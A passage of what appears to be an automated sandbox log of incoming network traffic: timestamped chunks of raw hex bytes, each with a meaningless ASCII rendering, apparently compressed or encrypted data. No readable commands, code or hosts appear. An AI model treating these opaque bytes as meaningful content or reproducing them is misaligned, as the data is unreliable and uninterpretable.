              2022-01-14 10:25:31 UTC120INData Raw: 43 92 54 d5 0e 68 c5 c2 22 1b cd 42 1f cd 5f 91 43 97 d7 d8 fe 00 19 4d 8c e5 61 2e 64 ae 73 40 9c fe 27 cb 48 f4 b7 c9 14 37 0c b7 54 d6 a8 39 c2 a3 ea 80 97 0c f1 11 f8 67 de 1f 63 c7 99 01 f7 43 6e 4b b7 63 d4 7a 62 11 48 01 6a e6 cb 03 83 36 d8 6d 65 6d 6c 4b c1 94 a6 99 2f 47 cd a2 cf fa 91 2b 09 ac f5 42 a4 63 d5 8a f4 9a fc fa b1 30 8f a2 fb 91 59 c5 ab 39 20 0a cd 1f 41 3a b1 cc 9c 6b 37 7d c1 ff 1d 57 f2 88 af ad 61 fb d7 da 04 b1 16 dc 82 17 25 b9 f2 e7 a6 18 07 42 5a 91 7d b5 be 20 03 47 3b 77 a6 1d 21 7b 38 e4 23 ed ec 33 a0 d0 7e 9b 8a 91 14 63 d8 79 1e 51 cf 8f df 3f c7 49 22 37 e3 7d ed 1b c7 a7 1b ce d1 8f 48 28 d6 08 83 33 aa 60 71 8e 5e ca c0 24 e8 e8 5a 4e eb 17 fc 1e 13 ed fc f7 e1 3d 6c 9c f0 22 20 d1 7f b5 f7 96 11 f3 55 c9 4b 65 f5
              Data Ascii: CTh"B_CMa.ds@'H7T9gcCnKczbHj6memlK/G+Bc0Y9 A:k7}Wa%BZ} G;w!{8#3~cyQ?I"7}H(3`q^$ZN=l" UKe
              2022-01-14 10:25:31 UTC121INData Raw: 4f 61 54 a7 c4 fa 2c 8d c5 64 0a 15 91 12 ef 41 f6 8a af 22 59 4b 70 f1 7d 1d 34 30 3f 9a f0 5b 2e cb b3 41 8f c9 46 8b e0 7b 98 53 7a 99 63 52 0d 10 c1 7b 0a 90 21 c9 ce 54 db 2f ea 96 af 5c 78 85 e2 a2 6e c1 61 71 86 70 91 32 d0 0f fb e0 b7 fa 64 c1 cc d2 c0 2c 91 ab d8 08 6a 6f fb e3 23 dd 75 74 c1 dc fc 48 a5 da 5e 2c f1 02 8c 7b 7c 9a cb ce de b8 fe 43 3e 98 46 a9 41 76 2f 6f 3b 87 e4 cc db c8 ac 3d f5 06 42 bb 6a bc fb 89 e0 16 c8 c0 e3 68 b1 72 7a 99 cf 59 5e a6 79 15 0e 89 24 58 c1 6c da cb 5f 5a c8 db 3f 64 08 34 32 21 c0 92 53 7d ad 9d ac 0f 51 19 0b 1d 1c 41 96 52 81 fb 39 0e 60 da e7 07 e9 fc d5 48 f9 e2 ee ea 88 aa 86 68 b4 e5 a9 1d c5 76 81 9d ba dd 81 e0 b2 c0 7d ca 9e 83 0a 40 d8 b1 9a 59 07 64 ef cc 9b 6c f1 60 28 c1 a0 29 af 80 07 0f 53
              Data Ascii: OaT,dA"YKp}40?[.AF{SzcR{!T/\xnaqp2d,jo#utH^,{|C>FAv/o;=BjhrzY^y$Xl_Z?d42!S}QAR9`Hhv}@Ydl`()S
              2022-01-14 10:25:31 UTC125INData Raw: c1 13 fb e2 f0 e1 98 ef 16 12 60 da ae 41 9b 70 8c 3f 0b b3 04 1d 85 11 cd 00 3b 54 5b 24 51 61 00 44 57 4d 97 36 5f 58 ca d9 57 0e 60 c9 29 a5 bc 4b ed 6f dd 96 88 0c 64 ba 36 89 a9 8c a6 b3 9a 28 2a 26 51 6a 0e b0 c9 33 a9 d7 d8 e0 c1 11 38 ba e4 82 6a 7e af d3 45 64 a6 2d d1 a8 99 c0 fd fd e8 e1 6d d1 a5 ae 14 64 b6 03 af 6e ba ef 49 73 08 94 41 68 56 a0 3f 96 46 ba e3 5d d3 f7 95 d2 c8 cb 4f 66 30 dd 23 da eb ba 01 6f bc ad 8c 07 a4 e4 3c 16 7d 71 f8 68 a0 dc 08 2e 60 b1 e9 1d c0 0b fd fb a8 3d c5 64 43 6e a0 20 42 07 68 e8 8e 01 f0 8c 75 ea 67 29 b4 1c 52 9c de 61 36 3c 05 12 00 96 30 ce da b3 75 f2 00 9b d2 d6 06 1e 90 2b b6 8f 2d a2 2e 65 2d 57 27 63 e3 9e 21 ae 02 85 e1 64 c3 98 c7 29 ad 82 76 f2 65 8d 33 a3 bf 8e ad ff f4 68 b8 7c 66 ea e7 6e a1
              Data Ascii: `Ap?;T[$QaDWM6_XW`)Kod6(*&Qj38j~Ed-mdnIsAhV?F]Of0#o<}qh.`=dCn Bhug)Ra6<0u+-.e-W'c!d)ve3h|fn
              2022-01-14 10:25:31 UTC130INData Raw: d1 c2 29 c2 23 9f ae 48 e9 71 7a 60 79 70 91 17 3b 80 68 0a 22 2a 62 4e 88 66 28 6e a0 68 bf 02 ec 79 b6 68 a6 a0 e9 08 97 98 ff c4 f1 fa 39 85 bb 74 e8 eb f9 4d 13 f3 20 8d da b2 56 6b c9 9a 34 de 2c 94 15 eb 6f b5 3d 08 9e 34 0b 48 e0 a1 40 c8 72 c9 5c b5 87 4f 83 ee 8d 3f f9 56 a6 5d 44 09 ce d3 5e 33 9c f2 ec 35 14 5e a3 64 8c 73 1f ce 3a d5 21 99 7d 64 be 7d 86 6b 3f ed 56 c6 a4 35 c2 98 5f 6e 7f e4 8c 34 9d 47 81 7a 94 4e f6 26 43 e6 76 51 01 ba 31 14 65 2e 2f ae 16 80 bc e9 0b 0f 13 54 ca d0 d8 ee 9b b7 9f fb 12 71 18 9d 77 d1 5c d2 dd 52 82 79 f7 41 9e 32 d4 e8 58 49 fc a3 86 14 a8 97 cb 4a f9 bb f2 86 32 9a 0e 63 74 94 2e 4b 73 a8 fe 78 95 8b 72 be d0 ab cf 4a b2 18 00 f3 1f 13 80 79 50 6b 2d b1 d6 12 b3 31 85 a5 b6 5a ce bd 13 0d 4a 8a 66 fe bc
              Data Ascii: )#Hqz`yp;h"*bNf(nhyh9tM Vk4,o=4H@r\O?V]D^35^ds:!}d}k?V5_n4GzN&CvQ1e./Tqw\RyA2XIJ2ct.KsxrJyPk-1ZJf
              2022-01-14 10:25:31 UTC134INData Raw: d9 a3 13 73 65 3e 5d 58 73 af 3f d4 c7 01 01 bd b1 2c ba ea ca c4 46 4d c5 3d 81 b2 16 87 95 bc 10 bd 18 09 02 93 da a9 2d a2 2e d2 03 01 60 d5 47 20 49 99 a4 08 ad 83 80 8f b1 5f 2a 3a 1d 9f a7 bf 20 46 80 60 a5 56 c3 7b c9 cc b9 b9 aa 14 77 58 0d 1a 88 63 c0 f9 10 08 79 6a e1 51 3f 82 1b 20 e8 e5 79 0b fb 64 b5 9f 4c 87 0b 81 bb 61 d5 95 c9 42 46 e1 da 6d 33 ba 12 75 d2 69 5c da ac 13 bb 84 b6 0e 2d af 76 25 5e a0 4a e2 ef d3 58 d0 7f 57 25 74 02 c3 04 62 c7 2d 56 9b d9 54 b9 05 0e 7f eb 14 62 df 22 1e 8f c9 40 b8 94 35 a3 30 cc 6d 55 a1 ec e3 f3 54 f5 f1 59 8e ab eb 16 00 36 40 b6 42 c5 5f 1d a2 27 54 df 3c 1e 4f 3c 7e 25 a2 28 30 2a 7b f9 8a a4 9e fe cc 89 c5 9c 24 57 56 3e 8a 68 4b 37 fe 8e a9 be 8a 65 22 35 e0 c0 eb 80 20 5e d6 5f a7 b3 e8 91 db dc
              Data Ascii: se>]Xs?,FM=-.`G I_*: F`V{wXcyjQ? ydLaBFm3ui\-v%^JXW%tb-VTb"@50mUTY6@B_'T<O<~%(0*{$WV>hK7e"5 ^_
              2022-01-14 10:25:31 UTC138INData Raw: d9 29 e2 c2 48 e7 04 ed 06 76 5b 4b b4 01 6a 52 0c 37 46 7b 04 c7 46 1b 3a 5c 4f d8 bd 24 5d a9 c1 65 4a 87 04 8e 93 47 1d a1 c7 15 eb 47 6b 7a 95 b9 0f ed b9 b7 9f ac f8 12 1f aa 1e c1 a5 ac 1a b5 3f 97 0d 57 d2 83 be a0 d8 9b 8f 04 7a 26 8d 64 6b fe 59 23 b0 79 e8 9a b6 b7 e7 df 27 15 b5 51 73 a7 0a e2 17 6b 32 33 a9 ee 4d bd 10 b8 6d 22 5c d1 37 fe 9c 7f 9a e8 9b c2 eb 0f 5e c1 74 81 f4 ed 14 6d 28 20 b5 3b 9d 11 49 7e 97 dd 24 5a 79 e7 04 ef 13 49 cb 55 1f dc a2 2f 50 9a 54 6e ae 4f 0e d2 20 4c 93 d5 40 c4 e0 a1 af 28 36 55 0b b8 c4 f4 01 49 30 e8 98 2f f5 ae d6 ad e0 e4 d0 09 18 19 b7 cb e4 97 bc b0 41 4d 7d 7e c4 a5 6a a2 50 b9 6f 84 92 58 b7 97 ca ba 35 b0 7c d4 79 c6 e2 d9 77 d5 89 eb 63 6b 3b 71 7c 88 7e 47 be fa 10 30 34 d2 7f f4 63 ef c4 ef 6d
              Data Ascii: )Hv[KjR7F{F:\O$]eJGGkz?Wz&dkY#y'Qsk23Mm"\7^tm( ;I~$ZyIU/PTnO L@(6UI0/AM}~jPoX5|ywck;q|~G04cm
              2022-01-14 10:25:31 UTC142INData Raw: f4 99 a4 5d 3d f4 1b df b8 08 94 40 b1 1b a9 ed 4d 24 af a7 e7 c7 e2 0c 2d 68 53 32 5f a6 37 7c 47 16 86 eb 7e 73 61 2c 35 58 d0 dc 72 e2 f9 f7 9a 3c 11 f5 99 db 2c 80 61 50 2b 2b c5 a2 25 d1 13 a1 e9 f2 4e a5 39 51 f7 a3 26 a4 7f 80 84 10 9e 41 ec 6f f2 06 69 96 2f bc 0a fe 76 52 9d e1 3e 74 e0 ab 0b 8f dc a1 7d 16 64 74 38 63 f8 7a 98 03 4c a8 c8 f6 39 32 a9 05 52 35 5c 92 29 5a ba 01 dd 45 9e b8 6c 5b f2 67 2b 46 8c 72 e0 c1 20 51 01 62 b6 f3 99 c4 e5 d7 3b 8f 1f 48 8b 2e 32 24 0b b2 4b 8a 58 93 4a 46 55 18 b8 e8 c5 17 0c 6e 4b a2 56 cf 87 8e b8 79 12 cd 33 f6 69 52 92 4a b4 61 46 e5 0f f4 cf e4 ec 85 f3 b4 59 1b 38 30 6a 35 1f e3 64 3e ef 52 94 bf 00 6a 1e 37 74 4c 81 07 b3 9c 3e f8 1d ca b1 f2 2d a2 52 99 c4 6e dc a8 2e f0 96 57 e4 37 fe a4 3e 0d ba
              Data Ascii: ]=@M$-hS2_7|G~sa,5Xr<,aP++%N9Q&Aoi/vR>t}dt8czL92R5\)ZEl[g+Fr Qb;H.2$KXJFUnKVy3iRJaFY80j5d>Rj7tL>-Rn.W7>
              2022-01-14 10:25:31 UTC146INData Raw: 4e 1d 02 63 93 29 4a 0b 4b 3e 47 2f aa 85 5d a9 af bb 6b a4 23 5d 49 db 78 ce 4d 10 41 2e 82 9f 54 ce c9 ce 0f f4 b4 17 5e f6 6c bd 1e 63 ca 24 11 a5 7b 8a 39 76 46 f6 47 da 23 a1 66 63 be 0b f3 a0 5c 9c f0 71 cf dd 42 c5 bc 69 37 7e 2b 23 08 c5 64 03 72 74 e0 d9 51 00 db 22 af a5 b4 64 25 67 dd ab bf 9c f5 9e d5 8a e8 b6 e3 bc 02 15 8c 1f 6e 8e a5 b1 3c 06 54 ab 72 5f b5 4d d9 b1 7f 0c ab 4a 80 2b 69 50 21 77 e3 b5 65 c5 6c bb a4 29 d5 31 82 72 ad 62 82 fc 24 5c d9 d9 1f 1e 4f d2 ab a3 e5 ee a2 0c c1 82 1b f5 ba 1e e7 0f aa 8b c5 31 66 32 55 8d 67 a4 c8 4a 35 af 19 e5 91 18 6a 64 b0 11 78 1e 14 12 33 26 c9 60 f4 1c 69 67 e0 88 09 12 d9 f9 e7 4b e3 0e 86 7e c1 94 ab 74 8c 81 01 30 a7 17 57 cb b2 43 15 a8 0c e3 6f ad 30 ea 90 78 fe 7c 90 5c 11 ed 41 c5 36
              Data Ascii: Nc)JK>G/]k#]IxMA.T^lc${9vFG#fc\qBi7~+#drtQ"d%gn<Tr_MJ+iP!wel)1rb$\O1f2UgJ5jdx3&`igK~t0WCo0x|\A6
              2022-01-14 10:25:31 UTC150INData Raw: ce 08 93 d7 26 07 09 47 78 97 a3 ac b0 90 44 06 68 ae a5 09 7b b5 93 b1 35 32 36 23 ce 24 f7 8a 81 91 ac 7a 74 57 3f e9 6b 31 b2 e2 b2 18 2f bc 70 79 20 0b e6 c0 ff 9e 65 cc 2f 08 84 68 b6 1d 1f fe 65 30 61 c5 19 39 a4 71 02 76 50 7d 14 6a b4 e6 5d d0 d3 5d 56 8e 47 16 3a 01 41 a0 3b 9b 39 73 b1 8b f5 fa 2a 2e 1b 83 28 6a b3 c4 ff 94 15 16 d1 e3 32 3a 11 f6 ca f0 9f a8 d9 c3 cc c4 fe 79 ce 6c 6b 7e 07 8d 34 89 bc fa 3b 8c 17 ac e5 a9 0c 61 42 13 ea 19 c7 44 01 4a 97 f0 46 12 3c 0f 15 58 72 94 46 e4 68 7c 14 65 28 26 13 fc 10 28 22 25 e2 b0 01 ef f5 65 23 c5 7b 40 6a 48 5d 32 65 28 69 35 c7 05 f2 be 56 d6 bf 71 05 06 bc e0 be 06 db 52 af 25 be 17 2b 80 66 ae 12 70 48 cc c6 fd 09 ee 13 f9 e4 84 cc 76 59 21 9b c6 b0 10 09 47 7d 20 72 92 46 40 9e 57 99 59 c1
              Data Ascii: &GxDh{526#$ztW?k1/py e/he0a9qvP}j]]VG:A;9s*.(j2:ylk~4;aBDJF<XrFh|e(&("%e#{@jH]2e(i5VqR%+fpHvY!G} rF@WY
              2022-01-14 10:25:31 UTC153INData Raw: 00 47 33 44 c8 3d 86 6c b5 8e ad 37 88 7a 34 8f 6e fa e8 c8 25 00 62 bd 63 23 c9 b3 29 bd 6c e4 29 f9 1b 6c 58 cf 49 60 d5 98 e9 11 e5 47 be bb 99 09 f5 e1 21 cb 56 8d 75 07 06 cc 54 9f 41 4a 1e 53 7a 90 44 55 fd f5 ec c1 a1 ec 60 06 2d b6 05 0c 7a eb a1 aa 1e 11 46 a2 c6 29 2f b6 04 94 50 26 ed 1f d9 d3 80 ea 8d cd 44 5e 74 dc bd a2 99 d4 cb 07 c4 a3 4c 27 58 c7 59 4f 7e 5d e4 8d d5 f4 d2 06 c6 24 05 f5 46 54 d3 5d 4d 60 aa 88 7a 9c 67 8f 97 36 a0 98 55 4a e6 98 3c 80 66 bb 3f 37 d8 4f de 06 98 46 e4 9f ac b1 98 45 96 89 45 78 92 48 14 aa 22 51 69 2e 87 7b 76 05 de bd 61 5c 32 95 ba 01 e8 91 d0 c9 46 97 8f dd 04 1e 4a ff 1a e1 50 1d d7 fa a0 97 ca 1f 4b 0a 62 7f 9c 8a 70 39 82 77 01 4b 42 5f f8 2d a1 6c 3b 99 d1 05 b4 4c 09 bc 38 1c 49 60 cd c0 4d 7d 10
              Data Ascii: G3D=l7z4n%bc#)l)lXI`G!VuTAJSzDU`-zF)/P&D^tL'XYO~]$FT]M`zg6UJ<f?7OFEExH"Qi.{va\2FJPKbp9wKB_-l;L8I`M}
              2022-01-14 10:25:31 UTC157INData Raw: 37 48 a2 32 46 1e ce 9e 40 14 75 77 6b 27 7c fa 6f 33 4f 1d a1 54 1d b1 60 ad 29 2a 4d 1f a9 b2 29 f4 26 ec a0 14 16 85 f2 89 51 05 e2 16 11 95 96 c4 ad 8e 20 b7 14 3e 7d 15 ee fe 18 68 c2 8f c1 68 5c a4 4e 08 4e 83 1e e7 74 5e 18 07 73 e6 e9 6a da a6 06 d4 91 7f 38 2a 95 90 88 ea d3 1c 17 38 aa 25 49 df 4b 9e 36 d5 85 88 91 61 36 5f 18 bb 3d 88 0e 8b 44 59 37 9e 21 b1 ea 91 f9 8d c2 f9 1e 2f c9 b4 89 82 90 91 a5 6a 06 f8 0b 06 e2 d9 4a e7 38 42 46 62 87 5d a4 a9 ea 75 5c 95 71 f1 25 f4 ba c3 17 1a 57 ac dc d7 da 5f 2f c1 6a ab ea c8 59 0b e5 7e 7a 1f 43 f2 67 2d dc d0 ca 3b ec 95 d4 2f d7 5f b3 9d 79 a6 5b 31 b8 21 85 aa b0 cf e7 7f 9a a0 24 a9 15 85 17 1a 33 d3 43 95 ad d5 93 85 fe 19 03 b5 34 48 fc 6b 51 08 9c 6d 5e db 22 b0 6f f1 fa d3 ca 39 2e b1 42
              Data Ascii: 7H2F@uwk'|o3OT`)*M)&Q >}hh\NNt^sj8*8%IK6a6_=DY7!/jJ8BFb]u\q%W_/jY~zCg-;/_y[1!$3C4HkQm^"o9.B
              2022-01-14 10:25:31 UTC162INData Raw: 91 d2 4b 16 7b 12 bc 54 a0 79 fe 13 f5 e0 be 17 57 d1 bd b5 85 17 2d b9 84 13 85 0f 95 d4 57 9f a4 36 3c 15 f7 11 4d 7f 10 c5 19 18 d6 a3 46 bc e7 ad 4c 93 c2 ae c3 90 87 8f 3a e6 4e e8 8b f5 e4 7e 3b 14 07 eb eb 0e 67 3a 18 10 71 1e 3d 8f c0 06 6b 31 b3 83 eb 70 d5 5f ba 05 07 11 4e 48 90 ee 21 98 37 75 99 77 a3 de ee b8 48 70 32 6a 57 7f bb d3 b0 ae 70 c9 1f 31 8b bd d1 bf 47 ee 12 6f 36 30 23 c8 84 e7 4e 14 8b 0a 77 4e eb b5 8a 79 16 2c a2 97 41 b5 72 f0 72 a2 50 99 0a cc a6 24 52 f1 17 ea da 1b 93 30 d7 dd cd 1f d7 f5 fc 74 99 90 f2 ac 9e 5d 60 1a d3 58 2b 06 e6 14 19 9f 48 f1 60 56 63 2a 28 21 da b3 7d e3 c3 c2 f8 a4 2e 35 4e 2e 33 4e 0e b2 00 75 23 95 61 64 90 21 2d a5 d8 1a e5 17 f9 ec 9c 2a cf a0 c8 46 5c fb f4 76 71 a9 b9 93 2e 8e 5e 3b a6 71 8b
              Data Ascii: K{TyW-W6<MFL:N~;g:q=k1p_NH!7uwHp2jWp1Go60#NwNy,ArrP$R0t]`X+H`Vc*(!}.5N.3Nu#ad!-*F\vq.^;q
              2022-01-14 10:25:31 UTC166INData Raw: 88 55 01 ba 3c ed 47 7b 5a e2 85 0a e0 51 6d 77 e8 28 40 5c 01 02 cc 96 9c 79 cf 53 e1 76 45 34 e1 33 2c bb 0e 3b 59 42 b5 52 fb a7 6e a1 77 94 3f ce 7e 89 b1 55 5a 82 b9 75 4b a0 29 f6 c3 7e 54 51 7a 01 bb 21 5d e3 32 3a 11 ee d3 ee 96 e7 a2 c3 94 36 5b a4 ad 2b 0e 72 05 b3 f6 95 ce 38 a2 50 5b 0f b5 e7 a2 b3 cd 2b 0b 7a df 4a 37 23 8a 73 af 25 81 9a f2 20 00 9d 00 dd 60 df 90 dc e7 05 86 cd 17 7d 9d a5 bf 6c b4 56 46 81 fa 44 9c e4 fe c1 dc 97 e6 a0 40 a1 c9 21 af 7b 0b 95 97 33 29 de 78 bd b7 83 bf cd 30 d8 e0 c2 0e b9 64 5a 6f 41 f8 6f ec 92 4e f8 76 c9 35 6a 05 1d 20 47 f7 38 51 23 b8 80 f8 2b c2 26 c0 a3 8c d0 78 cc d6 0b 32 6d 0f 4b 2a 6b 31 6f 69 68 91 1c d0 1d fc e9 a0 0e 3d 01 b2 1b 67 21 8b b4 52 a9 33 50 5d 2f 58 b8 8f 99 98 01 be d9 4f 8b f5
              Data Ascii: U<G{ZQmw(@\ySvE43,;YBRnw?~UZuK)~TQz!]2:6[+r8P[+zJ7#s% `}lVFD@!{3)x0dZoAoNv5j G8Q#+&x2mK*k1oih=g!R3P]/XO
              2022-01-14 10:25:31 UTC170INData Raw: 81 28 a0 72 49 ee 53 02 b8 eb 30 45 10 89 01 07 0a 8c b3 50 33 6c b5 6e c1 d9 82 1b 34 c3 47 d7 5d 4b 40 cc cb f2 a8 a7 c3 77 36 32 a5 d0 4e e0 dd 13 58 ea fa 78 fe 76 54 d1 9e 39 78 d3 3a da eb 1f c4 f3 8d 53 b3 ce 92 de 77 60 85 38 33 d3 e2 27 13 b6 0d 5d 4d 8e d4 8c 69 b1 9c 5f 25 37 61 a4 37 e7 7e f1 cc 48 80 ca b3 f7 c3 92 e4 e7 7d 63 63 4f 3e 23 2c e8 fe 18 85 d5 09 84 cc de fa 33 30 0e be fe 6d 03 c9 59 3b 6e d8 ab 80 74 c1 03 9b aa 8a e6 84 ba e3 31 34 41 a2 38 2f 53 19 9a 85 e2 b1 9c 30 f3 e3 7a 25 6a 23 5d 56 52 86 40 a8 4c 21 1c a5 c1 67 c1 6d f3 48 20 23 b3 84 db 3f 52 b8 89 30 37 11 d7 5f 96 0e cc d0 e4 d9 c7 6e 02 fa 58 99 45 2b ca 18 68 33 ea 59 23 cb dd 4e 37 5d ec 15 31 b8 ba 3a f3 95 bb f8 ae 66 14 0c 02 7c 19 e3 37 95 a3 d3 ce b9 fd 78
              Data Ascii: (rIS0EP3ln4G]K@w62NXxvT9x:Sw`83']Mi_%7a7~H}ccO>#,30mY;nt14A8/S0z%j#]VR@L!gmH #?R07_nXE+h3Y#N7]1:f|7x
              2022-01-14 10:25:31 UTC174INData Raw: 5d fc 47 b2 6a 28 84 1c 3d 22 31 43 ea 69 1a 96 55 ce c8 b3 5f ea 2e ac d2 1c d9 4f 0c c5 05 ba f7 15 ce 76 93 63 17 83 9c a7 56 8d 6e 9c 9b df a7 de 9a ed f5 55 38 29 02 91 bd 12 d2 d6 a1 89 2d dd f8 19 46 7f da 4f 86 a3 07 b2 d3 9e 20 37 96 c3 77 03 03 72 09 77 4f d9 be db 0c b6 60 51 64 d0 4a 92 2c 76 e3 4f c8 20 3e 05 9b 13 c0 6b 5a ef 95 ce bf df f3 03 94 4a 9e 76 72 44 3e a3 78 09 d4 e4 aa 86 71 af b9 19 f4 94 04 27 c7 d7 93 d8 16 46 75 1c c9 7f cb cc a9 24 47 11 e3 a7 61 9f a8 33 79 34 de 2a 9c ba c0 d2 4a 75 8b f5 99 12 0f 45 d8 14 33 a1 7a 97 d0 f9 66 fe 0b 7e 33 1e 6a c0 39 fb e3 cd 10 9e ae cf c9 68 52 25 92 ab 19 5b 89 d4 b6 ff 96 d1 98 24 2a 84 5f e4 83 c7 d0 00 b8 3c 28 ae 0d 18 bc 84 e5 2d 5d 81 7d eb f6 53 fe 72 17 61 63 1a cd 50 6d 22 25
              Data Ascii: ]Gj(="1CiU_.OvcVnU8)-FO 7wrwO`QdJ,vO >kZJvrD>xq'Fu$Ga3y4*JuE3zf~3j9hR%[$*_<(-]}SracPm"%
              2022-01-14 10:25:31 UTC178INData Raw: 51 df 98 66 df 83 9f 99 75 27 a0 ed 7f 07 f3 ae 50 74 5a cc 1a 65 d6 92 fd b6 b4 f4 20 0e 26 f2 05 ba 73 e4 fd 95 ac eb 39 29 55 97 29 d0 b2 3f 2f 89 ae 47 a1 a0 c1 7b 5d 4b f6 cf cf 41 3d 7a b3 85 a4 51 d6 f9 fd 0d b6 1a 11 51 5a 5e 5c 26 df 1e a8 08 58 15 53 c7 e6 aa c1 1f f2 ec 69 a1 a3 71 70 06 68 8d f8 8b 3a 73 cb 5a af df e6 7a 72 89 a7 da 02 0f 69 39 e2 e3 6c 6a ee 24 5a 38 af 58 c3 ca 9b 0d 78 49 c4 d2 9f 38 26 d2 d3 7b 31 d7 02 72 1a 1c 49 ca f5 e4 09 6d c7 ad 29 fa de 54 44 dc d1 51 66 a5 ca 00 3d f5 9c 6c 3c 8f 35 ae 21 0b 8d 1c de 6e 48 cd e0 8c 50 f7 42 9b 87 e5 c4 df 5d df 67 07 4e 2a 70 32 d7 ae 47 95 82 bd b3 6d b6 2a d0 8e 02 94 23 21 50 9c f2 c8 fc cd 51 a4 3e 9b 25 9d 02 fa 9d 8e 76 c5 a3 2d c8 64 08 e2 84 f0 85 a9 dc 88 f3 b1 92 d2 ed
              Data Ascii: Qfu'PtZe &s9)U)?/G{]KA=zQQZ^\&XSiqph:sZzri9lj$Z8XxI8&{1rIm)TDQf=l<5!nHPB]gN*p2Gm*#!PQ>%v-d
              2022-01-14 10:25:31 UTC182INData Raw: 22 e0 b7 55 de 5a ab b4 7f 31 5d 6e 61 57 89 20 41 3c be 6f 9a d9 ac a2 7b 71 bf 7d f8 4b 65 e8 af ed fa 4b 7c 2f 60 87 e9 b2 f2 44 b1 9d 19 e1 6b 80 57 a6 ff 35 1a 05 63 c7 89 3c e4 39 b4 9e 0f d9 11 ee c0 27 59 ae f4 07 41 bf 70 a9 43 57 ae 4c 15 99 c2 98 92 46 74 21 18 fc c6 54 23 18 69 11 1f 7b 0b 56 8a 40 eb ec db 46 ae e3 21 15 c4 70 16 2c 4e 8f d2 64 d0 63 16 29 74 ce 2f 5c bd 8f cd 59 e7 73 9e d6 de 7f 6f 4c e5 19 06 99 34 b4 a7 95 e9 d8 87 58 7c 02 ea 4a 43 c6 e3 d6 7b 00 fe 90 00 0b 37 b4 a3 66 50 49 48 80 7c 25 e3 8d e4 42 0f cb ee f0 96 ba 97 a9 70 82 31 ed da ae dc 25 00 b1 27 d2 e4 99 f2 23 fc 59 36 f1 44 c1 18 b6 2e 22 bc 2e 87 f9 9a 41 08 4a 4c 4b ac 58 1d e2 66 3d 57 48 71 2a 70 9b 1c 95 34 19 d0 65 8e 18 f1 24 ea e4 c1 dc de cd 3a 01 69
              Data Ascii: "UZ1]naW A<o{q}KeK|/`DkW5c<9'YApCWLFt!T#i{V@F!p,Ndc)t/\YsoL4X|JC{7fPIH|%Bp1%'#Y6D.".AJLKXf=WHq*p4e$:i
              2022-01-14 10:25:31 UTC185INData Raw: 35 e4 d7 a6 5a f9 d3 75 fe 90 2f c9 fc 31 1e 49 38 04 19 73 1b e1 85 9b 63 d2 e1 05 2a 0e bc 16 91 5f 7a 69 ce a3 24 6a a0 5c 3c 89 58 c9 4b 90 5a 8d 57 6c ea 03 d9 70 a5 c1 87 44 f8 17 40 88 29 b0 70 08 b3 26 ae 0f 24 ad 03 a7 69 ef f6 d3 3d 3b 37 20 b0 13 16 da bb 6c 9d a5 28 79 c8 c6 33 16 f1 0b a0 0a ef 9c 1b be 5a 39 e6 74 9e a7 38 fd a3 93 9a 90 66 f7 81 b7 8c 0e 52 78 a6 b5 80 a8 97 8d fa 93 d8 8b 8c 2d 2c e5 8e ac 3b 7f cc d6 13 15 8c 95 45 cf cb 41 c2 75 7b 48 c8 1b e5 a7 6d 0f 16 57 eb 64 71 19 e2 20 af 33 39 39 c5 2b e5 01 02 52 1e 0d 5d 51 76 b0 18 e1 94 db 84 62 38 22 f9 4f 7d a7 5e 9e c3 ce 3a c1 e7 33 b3 a2 48 10 28 f7 20 11 59 3b 8b 90 18 72 9c af fb 5e 54 40 c4 3a c9 2b 1a 78 c9 fe 68 0a 0c 3b 9d 7a 9e d8 1c 85 72 b6 c5 0c 18 bb 88 11 26
              Data Ascii: 5Zu/1I8sc*_zi$j\<XKZWlpD@)p&$i=;7 l(y3Z9t8fRx-,;EAu{HmWdq 399+R]Qvb8"O}^:3H( Y;r^T@:+xh;zr&
              2022-01-14 10:25:31 UTC189INData Raw: 5f 9f 73 bd fa 51 61 70 07 c4 b6 91 1f 14 6e 43 50 65 ab c1 0c 29 ae f2 9f cb f5 6b 30 35 6d f8 f5 92 b1 cd 29 47 b2 b5 ba 71 94 f5 6b 8b 27 4d cc 75 8d a4 9d dc 98 f8 a0 a3 62 c4 df 7b 32 fe e6 2d ff 53 82 91 9a d1 52 7f e5 03 a0 a4 f2 cb ee b1 28 42 94 a6 01 ab 8e 81 d2 f5 26 87 24 e7 cc 4d ef a2 d1 9b a9 9b 4a 96 69 a7 a6 aa 54 b4 c2 2c b8 f4 72 f5 96 67 51 f1 d5 e8 d6 6c cc 2d 35 9a 58 59 ab a4 14 ca 29 1b f8 85 86 38 27 b9 ed c2 72 9e dc 00 e9 97 6c 82 0b e6 a9 3c 48 cc c3 75 40 5b 68 3e 8c 30 d5 77 e6 b9 49 cf d6 82 a8 3e 1f b5 04 6a 32 49 23 09 a0 f0 6f 6f 0f 7b b1 4b ca d8 e7 a5 46 c5 98 19 13 15 20 42 c7 8a 06 eb 15 50 f9 10 78 b7 df cc 7a f7 c4 35 a7 06 41 50 d4 48 aa d1 ae 30 b7 01 b8 64 87 de fb f4 f7 0a 0e 09 63 a1 35 d8 7b dd 17 91 d1 2d a1
              Data Ascii: _sQapnCPe)k05m)Gqk'Mub{2-SR(B&$MJiT,rgQl-5XY)8'rl<Hu@[h>0wI>j2I#oo{KF BPxz5APH0dc5{-
              2022-01-14 10:25:31 UTC194INData Raw: 8d 61 f7 e8 fc b7 55 27 6b 94 e2 f4 1d ea 9f 8b ac 80 76 b1 db 2a 76 fb 5d 4e 1a 06 bc 42 eb bf 1a 70 ef c5 99 ed 28 9a 31 e3 75 fc b8 1c d0 4a db 35 0b 3b b4 a7 ac f0 d9 d9 59 d1 21 0b 72 fa 3d 6c cf 14 98 b5 d1 15 bf 98 c7 07 86 4c c2 fa be e9 01 d8 8b 53 bb 79 59 d1 6e cb 51 4b 9f 35 13 0d 24 3b 99 c9 57 f2 e1 74 f5 90 ec ff 78 72 9b 6d 25 34 cd e5 44 16 5d e7 62 3f f1 60 6a 8a 44 0d 89 d2 10 d3 5e 81 4f 8d 61 c0 4e 5b d4 7e 76 f6 01 c6 7c 10 c6 05 ae ca 2d a6 5c f0 6d 12 85 bc 0f a9 1c df 30 4c ce 86 f6 dc ba cb d9 ac 15 1b 13 dd 6f 95 44 b4 90 0a 60 8c e4 59 5b 7f 5e 25 e9 09 de 62 cf f4 49 f9 20 fe 3c de ef cd af 68 eb 05 3d f9 03 a8 04 c8 6d 08 69 d7 63 43 84 6f 15 7f aa 64 16 0a 8a d1 92 0b 1f a7 09 27 43 c0 d7 15 df e1 32 0d 34 65 1e 61 da 26 9b
